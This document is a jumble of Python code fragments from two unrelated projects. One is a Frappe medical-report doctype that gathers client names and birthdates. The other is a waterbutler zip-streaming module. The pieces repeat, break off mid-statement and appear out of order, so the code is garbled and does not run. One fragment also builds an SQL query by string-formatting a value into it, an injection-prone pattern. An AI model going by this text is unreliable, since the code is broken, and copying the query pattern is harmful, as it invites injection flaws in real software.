"# ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz",
"= ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<div>\", \"\")",
"class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in self.ausgangslage: # if",
"korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist()",
"'' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return data else:",
"mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy')",
"korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\",",
"if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") #",
"license information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document",
"= employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"]",
"'{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = ''",
"= '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt:",
"korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\",",
"\" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] =",
"else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee`",
"# korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut =",
"else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = ''",
"= '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] = '' return data",
"= mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"]",
"# -*- coding: utf-8 -*- # Copyright (c) 2019, libracore and contributors #",
"# ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"</div>\", \"<br>\") # ausgangslage.bemerkung =",
"information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import",
"for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") #",
"korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung =",
"if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") #",
"= korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data =",
"ausgangslage.bemerkung.replace(\"<div>\", \"\") # for korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut =",
"0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv: data[\"rsv\"] = mandat.rsv",
"pass # def validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: #",
"korrespondenz in self.korrespondenz: # if korrespondenz.wortlaut: # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<br>\", \"\") # korrespondenz.wortlaut",
"data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else:",
"mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt else: data[\"rsv_kontakt\"] =",
"employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` = '{owner}'\"\"\".format(owner=frappe.session.user), as_dict=True) if len(employee)",
"2019, libracore and contributors # For license information, please see license.txt from __future__",
"if len(employee) > 0: data[\"beraterin\"] = employee[0].name else: data[\"beraterin\"] = '' if mandat.rsv:",
"# korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat):",
"ausgangslage.krankengeschichte.replace(\"<br>\", \"\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"</div>\", \"<br>\") # ausgangslage.krankengeschichte = ausgangslage.krankengeschichte.replace(\"<div>\", \"\") #",
"import formatdate class MedizinischerBericht(Document): pass # def validate(self): # for ausgangslage in self.ausgangslage:",
"korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {}",
"data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE",
"= korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat =",
"'' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM `tabEmployee` WHERE `user_id` =",
"libracore and contributors # For license information, please see license.txt from __future__ import",
"# def validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte",
"korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def get_deckblat_data(mandat): data = {} if mandat: mandat",
"# Copyright (c) 2019, libracore and contributors # For license information, please see",
"korrespondenz.bemerkung: # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<br>\", \"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung",
"'' if mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"]",
"\"\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"</div>\", \"<br>\") # korrespondenz.bemerkung = korrespondenz.bemerkung.replace(\"<div>\", \"\") @frappe.whitelist() def",
"formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name`",
"format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT `name` FROM",
"coding: utf-8 -*- # Copyright (c) 2019, libracore and contributors # For license",
"= ausgangslage.krankengeschichte.replace(\"<div>\", \"\") # if ausgangslage.bemerkung: # ausgangslage.bemerkung = ausgangslage.bemerkung.replace(\"<br>\", \"\") # ausgangslage.bemerkung",
"-*- coding: utf-8 -*- # Copyright (c) 2019, libracore and contributors # For",
"mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \" + patienten_kontakt.last_name",
"license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data",
"\" \" + patienten_kontakt.last_name data[\"geburtsdatum_klient\"] = formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"]",
"= frappe.get_doc(\"Mandat\", mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name +",
"= korrespondenz.wortlaut.replace(\"</div>\", \"<br>\") # korrespondenz.wortlaut = korrespondenz.wortlaut.replace(\"<div>\", \"\") # if korrespondenz.bemerkung: # korrespondenz.bemerkung",
"mandat.rsv: data[\"rsv\"] = mandat.rsv else: data[\"rsv\"] = '' if mandat.rsv_kontakt: data[\"rsv_kontakt\"] = mandat.rsv_kontakt",
"mandat) if mandat.kontakt: patienten_kontakt = frappe.get_doc(\"Contact\", mandat.kontakt) data[\"name_klient\"] = patienten_kontakt.first_name + \" \"",
"= formatdate(string_date=patienten_kontakt.geburtsdatum, format_string='dd.mm.yyyy') else: data[\"name_klient\"] = '' data[\"geburtsdatum_klient\"] = '' employee = frappe.db.sql(\"\"\"SELECT",
"def validate(self): # for ausgangslage in self.ausgangslage: # if ausgangslage.krankengeschichte: # ausgangslage.krankengeschichte ="
] |
[
") # Update file info self.file.compressed_size += len(compressed) ret += compressed # buffer",
"time import zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream",
"filename, stream = file_tuple filename = filename.strip('/') # Build a ZipInfo instance to",
"descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic",
"'<4sLLL' signature = b'PK\\x07\\x08' # magic number for data descriptor return struct.pack( fmt,",
"0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset = 0 for file",
"separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/') #",
"self._buffer = bytearray() # EOF is the buffer and stream are both empty",
"| dt[2] dostime = dt[3] << 11 | dt[4] << 5 | (dt[5]",
"ret += compressed # buffer any overages if n != -1 and len(ret)",
"-1 and len(ret) > n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer",
"compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper,",
"be used separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename =",
"self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size +=",
"Update file info self.file.compressed_size += len(compressed) ret += compressed # buffer any overages",
"while (n == -1 or len(ret) < n) and not self.stream.at_eof(): chunk =",
"*args, **kwargs): super().__init__() self.files = files @property def size(self): return 0 @asyncio.coroutine def",
"[ZipLocalFile(each) for each in streams] # Append a stream for the archive's footer",
"should not be used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files",
"for a zip archive Note: This class is tightly coupled to ZipStreamReader, and",
"descriptor (footer) for a local file in a zip archive Note: This class",
"and should not be used separately \"\"\" def __init__(self, file, stream, *args, **kwargs):",
"self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive",
"byte descriptor of file CRC, file size, and compress size\"\"\" self._eof = True",
"Build a ZipInfo instance to use for the file's header and footer self.zinfo",
"import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The",
"(dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack(",
"dt[1] << 5 | dt[2] dostime = dt[3] << 11 | dt[4] <<",
"self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0,",
"| (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir =",
"self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be updated",
"from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file",
"endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single, Zip-compressed stream\"\"\"",
"file size, and compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A",
"BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor",
"buffer and stream are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return",
"1980) << 9 | dt[1] << 5 | dt[2] dostime = dt[3] <<",
"asyncio import binascii import struct import time import zipfile import zlib from waterbutler.core.streams",
"super().__init__() self.files = files @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1):",
"and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip",
"file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return",
"(footer) for a local file in a zip archive Note: This class is",
"will be updated as file is streamed self.zinfo.CRC = 0 # define a",
"thin stream wrapper, used to update a ZipLocalFile as chunks are read Note:",
"= (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2] dostime",
"= self._buffer while (n == -1 or len(ret) < n) and not self.stream.at_eof():",
"information - needed to build the footer self.original_size = 0 self.compressed_size = 0",
"struct import time import zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams",
"This class is tightly coupled to ZipStreamReader, and should not be used separately",
"= yield from (self.stream()) ret = self._buffer while (n == -1 or len(ret)",
"self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir +",
"file's data has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor)",
"# modification date/time, in MSDOS format dosdate = (dt[0] - 1980) << 9",
"size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used",
"read Note: This class is tightly coupled to ZipStreamReader, and should not be",
"be wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for each in streams]",
"n != -1 and len(ret) > n: self._buffer = ret[n:] ret = ret[:n]",
"streamed self.zinfo.CRC = 0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED,",
"count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines",
"|= 0x08 # Initial CRC: value will be updated as file is streamed",
"zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC,",
"-1 or len(ret) < n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n,",
"be updated as file is streamed self.zinfo.CRC = 0 # define a compressor",
"_read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret =",
"= 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC:",
"been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream):",
"**kwargs): self.file = file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property",
"central directory for a zip archive Note: This class is tightly coupled to",
"import time import zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import",
"header, for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self):",
"the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion",
"data has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) )",
"central directory \"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS format dosdate",
"number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property",
"= 0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes",
"self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version,",
"n=-1): file_headers = [] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset =",
"from (self.stream()) ret = self._buffer while (n == -1 or len(ret) < n)",
"<reponame>laurenrevere/waterbutler import asyncio import binascii import struct import time import zipfile import zlib",
"super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for",
"self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file",
"stream, *args, **kwargs): self.file = file self.stream = stream self._buffer = bytearray() super().__init__(*args,",
"ret = self._buffer while (n == -1 or len(ret) < n) and not",
"import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import",
"filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt",
"**kwargs): super().__init__() self.files = files @property def size(self): return 0 @asyncio.coroutine def _read(self,",
"*streams): # Each incoming stream should be wrapped in a _ZipFile instance streams",
"binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof()",
"meta information - needed to build the footer self.original_size = 0 self.compressed_size =",
"zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed to build the footer",
"directory_header(self): \"\"\"The file's header, for inclusion in the archive's central directory \"\"\" dt",
"compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed",
"self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and",
"**kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer while (n",
"zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream",
"binascii import struct import time import zipfile import zlib from waterbutler.core.streams import BaseStream",
"stream are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class",
"a ZipInfo instance to use for the file's header and footer self.zinfo =",
"StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in a zip",
"ZipInfo instance to use for the file's header and footer self.zinfo = zipfile.ZipInfo(",
"| dt[4] << 5 | (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits",
"Note: This should be access after the file's data has been streamed. \"\"\"",
"return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory",
"be used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files = files",
"should not be used separately \"\"\" def __init__(self, file): super().__init__() self.file = file",
"descriptor of file CRC, file size, and compress size\"\"\" self._eof = True return",
"return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single,",
"zip archive Note: This class is tightly coupled to ZipStreamReader, and should not",
"ret[:n] else: self._buffer = bytearray() # EOF is the buffer and stream are",
"modification date/time, in MSDOS format dosdate = (dt[0] - 1980) << 9 |",
"self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data),",
"and footer Note: This should be access after the file's data has been",
"local file in a zip archive Note: This class is tightly coupled to",
"def __init__(self, file): super().__init__() self.file = file @property def size(self): return 0 @asyncio.coroutine",
"__init__(self, file, stream, *args, **kwargs): self.file = file self.stream = stream self._buffer =",
"use for the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], )",
"return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in",
"filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved,",
"extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version,",
"zlib.DEFLATED, -15, ) # meta information - needed to build the footer self.original_size",
"n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer",
"9 | dt[1] << 5 | dt[2] dostime = dt[3] << 11 |",
"# Update file info self.file.compressed_size += len(compressed) ret += compressed # buffer any",
"a _ZipFile instance streams = [ZipLocalFile(each) for each in streams] # Append a",
"= b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count,",
"from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer)",
"self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to",
"0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be updated as file",
"\"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/') # Build",
"dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return",
"date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0",
"file's header, for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def",
"if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed) ret",
"file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed =",
"__init__(self, files, *args, **kwargs): super().__init__() self.files = files @property def size(self): return 0",
"0x08 # Initial CRC: value will be updated as file is streamed self.zinfo.CRC",
"ZipLocalFile as chunks are read Note: This class is tightly coupled to ZipStreamReader,",
"extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL'",
"for inclusion in the archive's central directory \"\"\" dt = self.zinfo.date_time # modification",
"= self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update",
"size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream =",
"len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0,",
"**kwargs): \"\"\"Create 16 byte descriptor of file CRC, file size, and compress size\"\"\"",
"chunks are read Note: This class is tightly coupled to ZipStreamReader, and should",
"self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a",
"# modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr,",
"0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams",
"bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note: This class",
"= '<4sLLL' signature = b'PK\\x07\\x08' # magic number for data descriptor return struct.pack(",
"file_tuple): filename, stream = file_tuple filename = filename.strip('/') # Build a ZipInfo instance",
"= 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's",
"class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note: This class is",
"fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of",
"coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file,",
"= file @property def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create",
"@asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC, file",
"self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial",
"be used separately \"\"\" def __init__(self, file): super().__init__() self.file = file @property def",
"0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header,",
"+ self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature",
"def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret",
"define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information",
"Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed",
"after the file's data has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size",
"11 | dt[4] << 5 | (dt[5] // 2) extra_data = self.zinfo.extra filename,",
"self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property",
"= 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be updated as",
"buffer any overages if n != -1 and len(ret) > n: self._buffer =",
"waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream):",
"struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time",
"*args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer while",
"zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 #",
"archive's central directory \"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS format",
"ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file, stream, *args,",
"<< 11 | dt[4] << 5 | (dt[5] // 2) extra_data = self.zinfo.extra",
"zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset",
"< n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) #",
"self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive",
"any overages if n != -1 and len(ret) > n: self._buffer = ret[n:]",
"zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed) ret += compressed #",
"content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion in",
"date/time, in MSDOS format dosdate = (dt[0] - 1980) << 9 | dt[1]",
"in a _ZipFile instance streams = [ZipLocalFile(each) for each in streams] # Append",
"size, and compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin",
"compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info",
"\"\"\"A thin stream wrapper, used to update a ZipLocalFile as chunks are read",
"@property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08'",
"self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count =",
"stream wrapper, used to update a ZipLocalFile as chunks are read Note: This",
"# EOF is the buffer and stream are both empty if not self._buffer",
"+ len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note:",
"separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file = file self.stream =",
"separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files = files @property def",
"Initial CRC: value will be updated as file is streamed self.zinfo.CRC = 0",
"def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor",
